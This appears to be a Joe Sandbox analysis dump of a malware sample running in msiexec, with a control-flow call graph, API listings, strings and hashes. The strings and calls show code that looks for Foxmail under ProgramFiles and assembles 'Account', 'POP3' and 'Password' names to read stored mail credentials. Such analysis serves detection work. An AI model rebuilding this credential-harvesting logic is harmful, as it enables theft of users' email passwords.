7475 232d6368 _free 20 API calls 7473->7475 7476 232d4d01 38 API calls 7474->7476 7480 232d4c6b 7475->7480 7478 232d4c88 7476->7478 7477 232d571e _free 20 API calls 7477->7468 7479 232d571e _free 20 API calls 7478->7479 7478->7480 7479->7480 7480->7477 7483 232d4d26 7481->7483 7485 232d4d86 7483->7485 7487 232d70eb 7483->7487 7484 232d4c50 7484->7471 7485->7484 7486 232d70eb 38 API calls 7485->7486 7486->7485 7490 232d7092 7487->7490 7491 232d54a7 __fassign 38 API calls 7490->7491 7492 232d70a6 7491->7492 7492->7483 6341 232d281c 6344 232d2882 6341->6344 6347 232d3550 6344->6347 6346 232d282a 6348 232d355d 6347->6348 6351 232d358a 6347->6351 6349 232d47e5 ___std_exception_copy 21 API calls 6348->6349 6348->6351 6350 232d357a 6349->6350 6350->6351 6353 232d544d 6350->6353 6351->6346 6354 232d5468 6353->6354 6355 232d545a 6353->6355 6356 232d6368 _free 20 API calls 6354->6356 6355->6354 6360 232d547f 6355->6360 6357 232d5470 6356->6357 6358 232d62ac ___std_exception_copy 26 API calls 6357->6358 6359 232d547a 6358->6359 6359->6351 6360->6359 6361 232d6368 _free 20 API calls 6360->6361 6361->6357 6362 232d2418 6363 232d2420 ___scrt_release_startup_lock 6362->6363 6366 232d47f5 6363->6366 6365 232d2448 6367 232d4808 6366->6367 6368 232d4804 6366->6368 6371 232d4815 6367->6371 6368->6365 6372 232d5b7a _free 20 API calls 6371->6372 6374 232d482c 6372->6374 6373 232d2ada _ValidateLocalCookies 5 API calls 6375 232d4811 6373->6375 6374->6373 6375->6365 5722 232d1c5b 5723 232d1c6b ___scrt_fastfail 5722->5723 5726 232d12ee 5723->5726 5725 232d1c87 5727 232d1324 ___scrt_fastfail 5726->5727 5728 232d13b7 GetEnvironmentVariableW 5727->5728 5752 232d10f1 5728->5752 5731 232d10f1 57 API calls 5732 232d1465 5731->5732 5733 232d10f1 57 API calls 5732->5733 5734 232d1479 5733->5734 5735 232d10f1 57 API calls 5734->5735 5736 232d148d 5735->5736 5737 232d10f1 57 API calls 5736->5737 5738 232d14a1 5737->5738 5739 232d10f1 57 API calls 5738->5739 5740 232d14b5 lstrlenW 5739->5740 5741 232d14d9 lstrlenW 5740->5741 5742 232d14d2 5740->5742 5743 232d10f1 57 API calls 5741->5743 5742->5725 5744 232d1501 lstrlenW lstrcatW 5743->5744 5745 232d10f1 57 API calls 5744->5745 5746 232d1539 lstrlenW lstrcatW 5745->5746 5747 232d10f1 57 API calls 5746->5747 5748 232d156b lstrlenW lstrcatW 5747->5748 5749 232d10f1 57 API calls 5748->5749 5750 232d159d lstrlenW lstrcatW 5749->5750 5751 232d10f1 57 API calls 5750->5751 5751->5742 5753 232d1118 ___scrt_fastfail 5752->5753 5754 232d1129 lstrlenW 5753->5754 5765 232d2c40 5754->5765 5756 232d1148 lstrcatW lstrlenW 5757 232d1168 lstrlenW 5756->5757 5758 232d1177 lstrlenW FindFirstFileW 5756->5758 5757->5758 5759 232d11e1 5758->5759 5760 232d11a0 5758->5760 5759->5731 5761 232d11aa 5760->5761 5762 232d11c7 FindNextFileW 5760->5762 5761->5762 5767 232d1000 5761->5767 5762->5760 5764 232d11da FindClose 5762->5764 5764->5759 5766 232d2c57 5765->5766 5766->5756 5766->5766 5768 232d1022 ___scrt_fastfail 5767->5768 5769 232d10af 5768->5769 5770 232d102f lstrcatW lstrlenW 5768->5770 5771 232d10b5 lstrlenW 5769->5771 5782 232d10ad 5769->5782 5772 232d106b lstrlenW 5770->5772 5773 232d105a lstrlenW 5770->5773 5798 232d1e16 5771->5798 5784 232d1e89 lstrlenW 5772->5784 5773->5772 5776 232d1088 GetFileAttributesW 5778 232d109c 5776->5778 5776->5782 5777 232d10ca 5779 232d1e89 5 API calls 5777->5779 5777->5782 5778->5782 5790 232d173a 5778->5790 5781 232d10df 5779->5781 5803 232d11ea 5781->5803 5782->5761 5785 232d2c40 ___scrt_fastfail 5784->5785 5786 232d1ea7 lstrcatW lstrlenW 5785->5786 5787 232d1ed1 lstrcatW 5786->5787 5788 232d1ec2 5786->5788 5787->5776 5788->5787 5789 232d1ec7 lstrlenW 5788->5789 5789->5787 5791 232d1747 ___scrt_fastfail 5790->5791 5818 232d1cca 5791->5818 5794 232d199f 5794->5782 5796 232d1824 ___scrt_fastfail _strlen 5796->5794 5838 232d15da 5796->5838 5799 232d1e29 5798->5799 5802 232d1e4c 5798->5802 5800 232d1e2d lstrlenW 5799->5800 5799->5802 5801 232d1e3f lstrlenW 5800->5801 5800->5802 5801->5802 5802->5777 5804 232d120e ___scrt_fastfail 5803->5804 5805 232d1e89 5 API calls 5804->5805 5806 232d1220 GetFileAttributesW 5805->5806 5807 232d1235 5806->5807 5808 232d1246 5806->5808 5807->5808 5811 232d173a 35 API calls 5807->5811 5809 232d1e89 5 API calls 5808->5809 5810 232d1258 5809->5810 5812 232d10f1 56 API calls 5810->5812 5811->5808 5813 232d126d 5812->5813 5814 232d1e89 5 API calls 5813->5814 5815 232d127f ___scrt_fastfail 5814->5815 5816 232d10f1 56 API calls 5815->5816 5817 232d12e6 5816->5817 5817->5782 5819 232d1cf1 ___scrt_fastfail 5818->5819 5820 232d1d0f CopyFileW CreateFileW 5819->5820 5821 232d1d55 GetFileSize 5820->5821 5822 232d1d44 DeleteFileW 5820->5822 5823 232d1ede 22 API calls 5821->5823 5827 232d1808 5822->5827 5824 232d1d66 ReadFile 5823->5824 5825 232d1d7d CloseHandle DeleteFileW 5824->5825 5826 232d1d94 CloseHandle DeleteFileW 5824->5826 5825->5827 5826->5827 5827->5794 5828 232d1ede 5827->5828 5831 232d222f 5828->5831 5830 232d224e 5830->5796 5831->5830 5834 232d2250 5831->5834 5846 232d474f 5831->5846 5851 232d47e5 5831->5851 5833 232d2908 5835 232d35d2 __CxxThrowException@8 RaiseException 5833->5835 5834->5833 5858 232d35d2 5834->5858 5837 232d2925 5835->5837 5837->5796 5839 232d160c _strcat _strlen 5838->5839 5840 232d163c lstrlenW 5839->5840 5946 232d1c9d 5840->5946 5842 232d1655 lstrcatW lstrlenW 5843 232d1678 5842->5843 5844 232d167e lstrcatW 5843->5844 5845 232d1693 ___scrt_fastfail 5843->5845 5844->5845 5845->5796 5861 232d4793 5846->5861 5849 232d478f 5849->5831 5850 232d4765 5867 232d2ada 5850->5867 5856 232d56d0 _free 5851->5856 5852 232d570e 5880 232d6368 5852->5880 5854 232d56f9 RtlAllocateHeap 5855 232d570c 5854->5855 5854->5856 5855->5831 5856->5852 5856->5854 5857 232d474f _free 7 API calls 5856->5857 5857->5856 5859 232d35f2 RaiseException 5858->5859 5859->5833 5862 232d479f ___DestructExceptionObject 5861->5862 5874 232d5671 RtlEnterCriticalSection 5862->5874 5864 232d47aa 5875 232d47dc 5864->5875 5866 232d47d1 _abort 5866->5850 5868 232d2ae5 IsProcessorFeaturePresent 5867->5868 5869 232d2ae3 5867->5869 5871 232d2b58 5868->5871 5869->5849 5879 232d2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5871->5879 5873 232d2c3b 5873->5849 5874->5864 5878 232d56b9 RtlLeaveCriticalSection 5875->5878 5877 232d47e3 5877->5866 5878->5877 5879->5873 5883 232d5b7a GetLastError 5880->5883 5884 232d5b99 5883->5884 5885 232d5b93 5883->5885 5889 232d5bf0 SetLastError 5884->5889 5909 232d637b 5884->5909 5902 232d5e08 5885->5902 5891 232d5bf9 5889->5891 5890 232d5bb3 5916 232d571e 5890->5916 5891->5855 5895 232d5bb9 5898 232d5be7 SetLastError 5895->5898 5896 232d5bcf 5929 232d593c 5896->5929 5898->5891 5900 232d571e _free 17 API calls 5901 232d5be0 5900->5901 5901->5889 5901->5898 5934 232d5c45 5902->5934 5904 232d5e2f 5905 232d5e47 TlsGetValue 5904->5905 5908 232d5e3b 5904->5908 5905->5908 5906 232d2ada _ValidateLocalCookies 5 API calls 5907 232d5e58 5906->5907 5907->5884 5908->5906 5914 232d6388 _free 5909->5914 5910 232d63c8 5913 232d6368 _free 19 API calls 5910->5913 5911 232d63b3 RtlAllocateHeap 5912 232d5bab 5911->5912 5911->5914 5912->5890 5922 232d5e5e 5912->5922 5913->5912 5914->5910 5914->5911 5915 232d474f _free 7 API calls 5914->5915 5915->5914 5917 232d5729 HeapFree 5916->5917 5921 232d5752 _free 5916->5921 5918 232d573e 5917->5918 5917->5921 5919 232d6368 _free 18 API calls 5918->5919 5920 232d5744 GetLastError 5919->5920 5920->5921 5921->5895 5923 232d5c45 _free 5 API calls 5922->5923 5924 232d5e85 5923->5924 5925 232d5e94 5924->5925 5926 232d5ea0 TlsSetValue 5924->5926 5927 232d2ada _ValidateLocalCookies 5 API calls 5925->5927 5926->5925 5928 232d5bc8 5927->5928 5928->5890 5928->5896 5940 232d5914 5929->5940 5937 232d5c71 5934->5937 5938 232d5c75 __crt_fast_encode_pointer 5934->5938 5935 232d5c95 5935->5938 5939 232d5ca1 GetProcAddress 5935->5939 5936 232d5ce1 _free LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5936->5937 5937->5935 5937->5936 5937->5938 5938->5904 5939->5938 5941 232d5854 _free RtlEnterCriticalSection RtlLeaveCriticalSection 5940->5941 5942 232d5938 5941->5942 5943 232d58c4 5942->5943 5944 232d5758 _free 20 API calls 5943->5944 5945 232d58e8 5944->5945 5945->5900 5947 232d1ca6 _strlen 5946->5947 5947->5842 7493 232d20db 7494 232d20e7 ___DestructExceptionObject 7493->7494 7495 232d2110 dllmain_raw 7494->7495 7496 232d20f6 7494->7496 7500 232d210b 7494->7500 7495->7496 7497 232d212a 7495->7497 7506 232d1eec 7497->7506 7499 232d2177 7499->7496 7501 232d1eec 31 API calls 7499->7501 7500->7496 7500->7499 7504 232d1eec 31 API calls 7500->7504 7502 232d218a 7501->7502 7502->7496 7503 232d2193 dllmain_raw 7502->7503 7503->7496 7505 232d216d dllmain_raw 7504->7505 7505->7499 7507 232d1f2a dllmain_crt_process_detach 7506->7507 7508 232d1ef7 7506->7508 7514 232d1f06 7507->7514 7509 232d1f1c dllmain_crt_process_attach 7508->7509 7510 232d1efc 7508->7510 7509->7514 7511 232d1f01 7510->7511 7512 232d1f12 7510->7512 7511->7514 7516 232d240b 7511->7516 7521 232d23ec 7512->7521 7514->7500 7529 232d53e5 7516->7529 7622 232d3513 7521->7622 7524 232d23f5 7524->7514 7527 232d2408 7527->7514 7528 232d351e 7 API calls 7528->7524 7535 232d5aca 7529->7535 7532 232d351e 7611 232d3820 7532->7611 7534 232d2415 7534->7514 7536 232d2410 7535->7536 7537 232d5ad4 7535->7537 7536->7532 7538 232d5e08 _free 11 API calls 7537->7538 7539 232d5adb 7538->7539 7539->7536 7540 232d5e5e _free 11 API calls 7539->7540 7541 232d5aee 7540->7541 7543 232d59b5 7541->7543 7544 232d59c0 7543->7544 7545 232d59d0 7543->7545 7549 232d59d6 7544->7549 7545->7536 7548 232d571e _free 20 API calls 7548->7545 7550 232d59e9 7549->7550 7551 232d59ef 7549->7551 7553 232d571e _free 20 API calls 7550->7553 7552 232d571e _free 20 API calls 7551->7552 7554 232d59fb 7552->7554 7553->7551 7555 232d571e _free 20 API calls 7554->7555 7556 232d5a06 7555->7556 7557 232d571e _free 20 API calls 7556->7557 7558 232d5a11 7557->7558 7559 232d571e _free 20 API calls 7558->7559 7560 232d5a1c 7559->7560 7561 232d571e _free 20 API calls 7560->7561 7562 232d5a27 7561->7562 7563 232d571e _free 20 API calls 7562->7563 7564 232d5a32 7563->7564 7565 232d571e _free 20 API calls 7564->7565 7566 232d5a3d 7565->7566 7567 232d571e _free 20 API calls 7566->7567 7568 232d5a48 7567->7568 7569 232d571e _free 20 API calls 7568->7569 7570 232d5a56 7569->7570 7575 232d589c 7570->7575 7581 232d57a8 7575->7581 7577 232d58c0 7578 232d58ec 7577->7578 7594 232d5809 7578->7594 7580 232d5910 7580->7548 7582 232d57b4 ___DestructExceptionObject 7581->7582 7589 232d5671 RtlEnterCriticalSection 7582->7589 7584 232d57e8 7590 232d57fd 7584->7590 7586 232d57be 7586->7584 7588 232d571e _free 20 API calls 7586->7588 7587 232d57f5 _abort 7587->7577 7588->7584 7589->7586 7593 232d56b9 RtlLeaveCriticalSection 7590->7593 7592 232d5807 7592->7587 7593->7592 7595 232d5815 ___DestructExceptionObject 7594->7595 7602 232d5671 RtlEnterCriticalSection 7595->7602 7597 232d581f 7603 232d5a7f 7597->7603 7599 232d5832 7607 232d5848 7599->7607 7601 232d5840 _abort 7601->7580 7602->7597 7604 232d5a8e __fassign 7603->7604 7606 232d5ab5 __fassign 7603->7606 7605 232d7cc2 __fassign 20 API calls 7604->7605 7604->7606 7605->7606 7606->7599 7610 232d56b9 RtlLeaveCriticalSection 7607->7610 7609 232d5852 7609->7601 7610->7609 7612 232d382d 7611->7612 7616 232d384b ___vcrt_freefls@4 7611->7616 7613 232d383b 7612->7613 7617 232d3b67 7612->7617 7615 232d3ba2 ___vcrt_FlsSetValue 6 API calls 7613->7615 7615->7616 7616->7534 7618 232d3a82 try_get_function 5 API calls 7617->7618 7619 232d3b81 7618->7619 7620 232d3b99 TlsGetValue 7619->7620 7621 232d3b8d 7619->7621 7620->7621 7621->7613 7628 232d3856 7622->7628 7624 232d23f1 7624->7524 7625 232d53da 7624->7625 7626 232d5b7a _free 20 API calls 7625->7626 7627 232d23fd 7626->7627 7627->7527 7627->7528 7629 232d385f 7628->7629 7630 232d3862 GetLastError 7628->7630 7629->7624 7631 232d3b67 ___vcrt_FlsGetValue 6 API calls 7630->7631 7632 232d3877 7631->7632 7633 232d38dc SetLastError 7632->7633 7634 232d3ba2 ___vcrt_FlsSetValue 6 API calls 7632->7634 7639 232d3896 7632->7639 7633->7624 7635 232d3890 7634->7635 7636 232d38b8 7635->7636 7637 232d3ba2 ___vcrt_FlsSetValue 6 API calls 7635->7637 7635->7639 7638 232d3ba2 ___vcrt_FlsSetValue 6 API calls 7636->7638 7636->7639 7637->7636 7638->7639 7639->7633 7248 232d4a9a 7249 232d5411 38 API calls 7248->7249 7250 232d4aa2 7249->7250 7640 232d73d5 7641 232d73e1 ___DestructExceptionObject 7640->7641 7652 232d5671 RtlEnterCriticalSection 7641->7652 7643 232d73e8 7653 232d8be3 7643->7653 7645 232d73f7 7651 232d7406 7645->7651 7666 232d7269 GetStartupInfoW 7645->7666 7649 232d7417 _abort 7677 232d7422 7651->7677 7652->7643 7654 232d8bef ___DestructExceptionObject 7653->7654 7655 232d8bfc 7654->7655 7656 232d8c13 7654->7656 7658 232d6368 _free 20 API calls 7655->7658 7680 232d5671 RtlEnterCriticalSection 7656->7680 7659 232d8c01 7658->7659 7660 232d62ac ___std_exception_copy 26 API calls 7659->7660 7661 232d8c0b _abort 7660->7661 7661->7645 7664 232d8c1f 7665 232d8c4b 7664->7665 7681 232d8b34 7664->7681 7688 232d8c72 7665->7688 7667 232d7318 7666->7667 7668 232d7286 7666->7668 7672 232d731f 7667->7672 7668->7667 7669 232d8be3 27 API calls 7668->7669 7670 232d72af 7669->7670 7670->7667 7671 232d72dd GetFileType 7670->7671 7671->7670 7673 232d7326 7672->7673 7674 232d7369 GetStdHandle 7673->7674 7675 232d73d1 7673->7675 7676 232d737c GetFileType 7673->7676 7674->7673 7675->7651 7676->7673 7692 232d56b9 RtlLeaveCriticalSection 7677->7692 7679 232d7429 7679->7649 7680->7664 7682 232d637b _free 20 API calls 7681->7682 7684 232d8b46 7682->7684 7683 232d8b53 7685 232d571e _free 20 API calls 7683->7685 7684->7683 7687 232d5eb7 11 API calls 7684->7687 7686 232d8ba5 7685->7686 7686->7664 7687->7684 7691 232d56b9 RtlLeaveCriticalSection 7688->7691 7690 232d8c79 7690->7661 7691->7690 7692->7679 7693 232d4ed7 7694 232d6d60 51 API calls 7693->7694 7695 232d4ee9 7694->7695 7704 232d7153 GetEnvironmentStringsW 7695->7704 7698 232d4ef4 7700 232d571e _free 20 API calls 7698->7700 7701 232d4f29 7700->7701 7702 232d4eff 7703 232d571e _free 20 API calls 7702->7703 7703->7698 7705 232d71bd 7704->7705 7706 232d716a 7704->7706 7707 232d4eee 7705->7707 7708 232d71c6 FreeEnvironmentStringsW 7705->7708 7709 232d7170 WideCharToMultiByte 7706->7709 7707->7698 7716 232d4f2f 7707->7716 7708->7707 7709->7705 7710 232d718c 7709->7710 7711 232d56d0 21 API calls 7710->7711 7712 232d7192 7711->7712 7713 232d7199 WideCharToMultiByte 7712->7713 7714 232d71af 7712->7714 7713->7714 7715 232d571e _free 20 API calls 7714->7715 7715->7705 7717 232d4f44 7716->7717 7718 232d637b _free 20 API calls 7717->7718 7729 232d4f6b 7718->7729 7719 232d4fcf 7720 232d571e _free 20 API calls 7719->7720 7721 232d4fe9 7720->7721 7721->7702 7722 232d637b _free 20 API calls 7722->7729 7723 232d4fd1 7724 232d5000 20 API calls 7723->7724 7726 232d4fd7 7724->7726 7725 232d544d ___std_exception_copy 26 API calls 7725->7729 7727 232d571e _free 20 API calls 7726->7727 7727->7719 7728 232d4ff3 7730 232d62bc ___std_exception_copy 11 API calls 7728->7730 7729->7719 7729->7722 7729->7723 7729->7725 7729->7728 7731 232d571e _free 20 API calls 7729->7731 7732 232d4fff 7730->7732 7731->7729 6944 232d5351 6945 232d5374 6944->6945 6946 232d5360 6944->6946 6947 232d571e _free 20 API calls 6945->6947 6946->6945 6948 232d571e _free 20 API calls 6946->6948 6949 232d5386 6947->6949 6948->6945 6950 232d571e _free 20 API calls 6949->6950 6951 232d5399 6950->6951 6952 232d571e _free 20 API calls 6951->6952 6953 232d53aa 6952->6953 6954 232d571e _free 20 API calls 6953->6954 6955 232d53bb 6954->6955 7251 232d3c90 RtlUnwind 7733 232d36d0 7734 232d36e2 7733->7734 7736 232d36f0 @_EH4_CallFilterFunc@8 7733->7736 7735 232d2ada _ValidateLocalCookies 5 API calls 7734->7735 7735->7736

                                                    Control-flow Graph

                                                    APIs
                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 232D1137
                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 232D1151
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 232D115C
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 232D116D
                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 232D117C
                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 232D1193
                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 232D11D0
                                                    • FindClose.KERNEL32(00000000), ref: 232D11DB
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                    • String ID:
                                                    • API String ID: 1083526818-0
                                                    • Opcode ID: 3e08357a3abb2503622da478ddeae658c2167524c303f769863f9dd547a439af
                                                    • Instruction ID: 9e4fa3b148aefa274c599cf7463b9250bec4b11e1828f25fd8cfd7041d955430
                                                    • Opcode Fuzzy Hash: 3e08357a3abb2503622da478ddeae658c2167524c303f769863f9dd547a439af
                                                    • Instruction Fuzzy Hash: CC21E17290431DABC720EA64DC4CF9B7B9CEF88714F14092ABA58D3090EB74E6558796

                                                    Control-flow Graph

                                                    APIs
                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 232D1434
                                                      • Part of subcall function 232D10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 232D1137
                                                      • Part of subcall function 232D10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 232D1151
                                                      • Part of subcall function 232D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 232D115C
                                                      • Part of subcall function 232D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 232D116D
                                                      • Part of subcall function 232D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 232D117C
                                                      • Part of subcall function 232D10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 232D1193
                                                      • Part of subcall function 232D10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 232D11D0
                                                      • Part of subcall function 232D10F1: FindClose.KERNEL32(00000000), ref: 232D11DB
                                                    • lstrlenW.KERNEL32(?), ref: 232D14C5
                                                    • lstrlenW.KERNEL32(?), ref: 232D14E0
                                                    • lstrlenW.KERNEL32(?,?), ref: 232D150F
                                                    • lstrcatW.KERNEL32(00000000), ref: 232D1521
                                                    • lstrlenW.KERNEL32(?,?), ref: 232D1547
                                                    • lstrcatW.KERNEL32(00000000), ref: 232D1553
                                                    • lstrlenW.KERNEL32(?,?), ref: 232D1579
                                                    • lstrcatW.KERNEL32(00000000), ref: 232D1585
                                                    • lstrlenW.KERNEL32(?,?), ref: 232D15AB
                                                    • lstrcatW.KERNEL32(00000000), ref: 232D15B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                    • String ID: )$Foxmail$ProgramFiles
                                                    • API String ID: 672098462-2938083778
                                                    • Opcode ID: 63bd6e7a99c9234a5ba2b36cd6eabbb6d8023e4e1be18bdd1c8a389f4e7ed693
                                                    • Instruction ID: f6243c5f9cf4c7c028778ffd796282a4698e8253c755575a0fba0b6ad140fa9f
                                                    • Opcode Fuzzy Hash: 63bd6e7a99c9234a5ba2b36cd6eabbb6d8023e4e1be18bdd1c8a389f4e7ed693
                                                    • Instruction Fuzzy Hash: A2818171A5036CA9DB20D7A1DC85FDE7379EF84700F0005EAE908E7191EAB17AC5CB95
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 232D61DA
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 232D61E4
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 232D61F1
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: 37db92167250a395ebd079158d5d8a303ea35cca972d0b93e17d419ca6a16280
                                                    • Instruction ID: a8f5ef5b0d25c3bf34826b0eb0e27fd60519fa59dacaed6b517ad078750c3741
                                                    • Opcode Fuzzy Hash: 37db92167250a395ebd079158d5d8a303ea35cca972d0b93e17d419ca6a16280
                                                    • Instruction Fuzzy Hash: 2C31C27591131C9BCB21DF24DD8878DBBB8EF18310F5081DAE81CA6250E774ABC18F45
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,232D4A8A,?,232E2238,0000000C,232D4BBD,00000000,00000000,?,232D2082,232E2108,0000000C,232D1F3A,?), ref: 232D4AD5
                                                    • TerminateProcess.KERNEL32(00000000,?,232D4A8A,?,232E2238,0000000C,232D4BBD,00000000,00000000,?,232D2082,232E2108,0000000C,232D1F3A,?), ref: 232D4ADC
                                                    • ExitProcess.KERNEL32 ref: 232D4AEE
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: dd3781d7160c00cd7da0df7aa88035dcd19af73771926fe828521c3d334035aa
                                                    • Instruction ID: 07d4d91e5930c28441a0c23cd8e1c9167d58416cdc1456f889b106187ab48e4f
                                                    • Opcode Fuzzy Hash: dd3781d7160c00cd7da0df7aa88035dcd19af73771926fe828521c3d334035aa
                                                    • Instruction Fuzzy Hash: 8DE0463660064CAFCF057F24DD0CA493B29FFA1342B408060FA448B021CB39E992CA44
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .
                                                    • API String ID: 0-248832578
                                                    • Opcode ID: d4d540c11494be5f77f2ccd373704e9bc2bb7eeefb5177596897c2a7131b9dcb
                                                    • Instruction ID: 815007a0789aee3fcc9e5b8b069747885171cd37cf0e41d9e71c2e4f5a632327
                                                    • Opcode Fuzzy Hash: d4d540c11494be5f77f2ccd373704e9bc2bb7eeefb5177596897c2a7131b9dcb
                                                    • Instruction Fuzzy Hash: 7D31287390020E6FDB149E78CC84EEA7BBDDF85304F5441DCE518D7251E675AA858B90
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: 85d0f82da74137f807a7c92f8fce545c2fb789b582408ed694918adaa5731f50
                                                    • Instruction ID: 72eaffd33b3ddbbd221d9ed7f259ff258ac0b4d4b8ec5db6dc84c44125528b13
                                                    • Opcode Fuzzy Hash: 85d0f82da74137f807a7c92f8fce545c2fb789b582408ed694918adaa5731f50
                                                    • Instruction Fuzzy Hash: 23A01130A002028F8300AE30830E20C3AACAAA238230080AAAA08C0080EB28C0208A00

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 232D1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 232D1D1B
                                                      • Part of subcall function 232D1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 232D1D37
                                                      • Part of subcall function 232D1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 232D1D4B
                                                    • _strlen.LIBCMT ref: 232D1855
                                                    • _strlen.LIBCMT ref: 232D1869
                                                    • _strlen.LIBCMT ref: 232D188B
                                                    • _strlen.LIBCMT ref: 232D18AE
                                                    • _strlen.LIBCMT ref: 232D18C8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2787297967.00000000232D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 232D0000, based on PE: true
                                                    • Associated: 0000000B.00000002.2787256687.00000000232D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 0000000B.00000002.2787297967.00000000232E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_232d0000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: _strlen$File$CopyCreateDelete
                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                    • API String ID: 3296212668-3023110444
                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                    • Instruction ID: cf91dcead0a4daff7fe1adc500af33e935be9171730ae7117893555ff05a2de1
                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
